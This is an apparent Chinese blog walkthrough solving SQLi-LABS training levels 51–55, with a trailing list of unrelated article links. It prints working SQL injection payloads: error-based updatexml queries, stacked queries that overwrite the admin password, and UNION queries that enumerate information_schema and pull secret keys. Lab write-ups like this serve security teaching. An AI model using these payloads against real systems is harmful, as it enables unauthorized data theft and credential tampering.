当前位置: 首页 > news >正文

SQLi-LABS通关攻略【51-55关】

news 来源:原创 2024/9/20 0:32:40

SQLi-LABS 51关

51关和50关一样,只是改为了单引号闭合

依旧有报错信息,可以使用报错注入

构造payload,得到数据库名

?sort=1' and updatexml(1,concat(1,database()),1)--+

SQLi-LABS 52关

52关和50关一样,但是没有报错信息,所以报错注入的方式行不通

可以使用堆叠注入或者时间盲注

这里使用堆叠注入

构造payload更改admin的密码,测试堆叠注入是否可行

?sort=1;update users set password='777' where username='admin'--+

修改成功,存在堆叠注入

SQLi-LABS 53关

53关和52关一样,同样是没有报错信息,但是是字符型,使用单引号闭合

构造payload更改admin的密码为444

?sort=1';update users set password='444' where username='admin'--+

 更改成功,存在堆叠注入

SQLi-LABS 54关

本关是全新的模式

这一关就是让我们在十次的查询次数内找到secret key

如果超过十次没有结果,那就会重置本关

我们直接测试闭合方式,是字符型,单引号闭合

因为题目中指定了数据库'challenges'

接下来直接使用联合注入进行表名查询

?id=-1'union select 1,2,table_name from information_schema.tables where table_schema=database()--+

得到表明是这个 p7bqnwkvaj

接下来查询字段

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='p7bqnwkvaj'--+

最后直接查询secret_VO6I字段

?id=-1'union select 1,2,secret_VO6I from p7bqnwkvaj--+

将得到key提交就算过关了

SQLi-LABS 55关

55关和54关一样,只是查询次数改为14次,闭合方式改为数字型括号闭合

题目依旧指定了数据库名是'challenges'

所以我们直接查表名

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 得到表明是250xkt025w

接下来查字段

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='250xkt025w'--+

查询secret_DMQK字段

?id=-1) union select 1,2,secret_DMQK from 250xkt025w --+

得到key后直接提交就可以通关了

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Jmeter下载、配置环境变量
  • 从插件plugin和钩子hook 到“智能化自动化”架构
  • Spring——控制反转(IOC)与依赖注入(DI)
  • python3 logging入门
  • 前端换行、空格的多种表现形式
  • 【Java设计模式】集合管道模式:简化数据操作
  • python-奥运奖牌计数
  • 鸿蒙OS试题(10)
  • vue脚手架的创建
  • 用ASP.NET Core WebApi把ofd文件上传到服务器上处理为pdf文件后返回一个服务器地址
  • Spring Boot 项目中,配合 Nacos 、Gateway使用 MinIO
  • 977.有序数组的平方
  • SpringWeb后端开发-登录认证
  • comfyUI好在哪?为啥大家都在用?
  • android 下拉刷新,androidx.swiperefreshlayout:swiperefreshlayout:1.1.0
  • hexo+github搭建个人博客
  • 03Go 类型总结
  • C++入门教程(10):for 语句
  • exports和module.exports
  • FineReport中如何实现自动滚屏效果
  • JavaScript函数式编程(一)
  • Linux链接文件
  • mysql常用命令汇总
  • PHP的类修饰符与访问修饰符
  • Redis字符串类型内部编码剖析
  • Spring Security中异常上抛机制及对于转型处理的一些感悟
  • 代理模式
  • 前端技术周刊 2019-01-14:客户端存储
  • 使用Tinker来调试Laravel应用程序的数据以及使用Tinker一些总结
  • 世界上最简单的无等待算法(getAndIncrement)
  • 职业生涯 一个六年开发经验的女程序员的心声。
  • 测评:对于写作的人来说,Markdown是你最好的朋友 ...
  • 曜石科技宣布获得千万级天使轮投资,全方面布局电竞产业链 ...
  • ​一文看懂数据清洗:缺失值、异常值和重复值的处理
  • #{} 和 ${}区别
  • #我与Java虚拟机的故事#连载08:书读百遍其义自见
  • (C#)一个最简单的链表类
  • (南京观海微电子)——I3C协议介绍
  • (十七)Flink 容错机制
  • (一)RocketMQ初步认识
  • (转)ABI是什么
  • (转)自己动手搭建Nginx+memcache+xdebug+php运行环境绿色版 For windows版
  • *ST京蓝入股力合节能 着力绿色智慧城市服务
  • ./configure,make,make install的作用
  • .NET “底层”异步编程模式——异步编程模型(Asynchronous Programming Model,APM)...
  • .net企业级架构实战之7——Spring.net整合Asp.net mvc
  • .NET下ASPX编程的几个小问题
  • .w文件怎么转成html文件,使用pandoc进行Word与Markdown文件转化
  • @JSONField或@JsonProperty注解使用
  • @media screen 针对不同移动设备
  • @SpringBootConfiguration重复加载报错
  • [ vulhub漏洞复现篇 ] AppWeb认证绕过漏洞(CVE-2018-8715)
  • [Android 13]Input系列--获取触摸窗口
  • [BUAA软工]第一次博客作业---阅读《构建之法》
  • [BUG] Authentication Error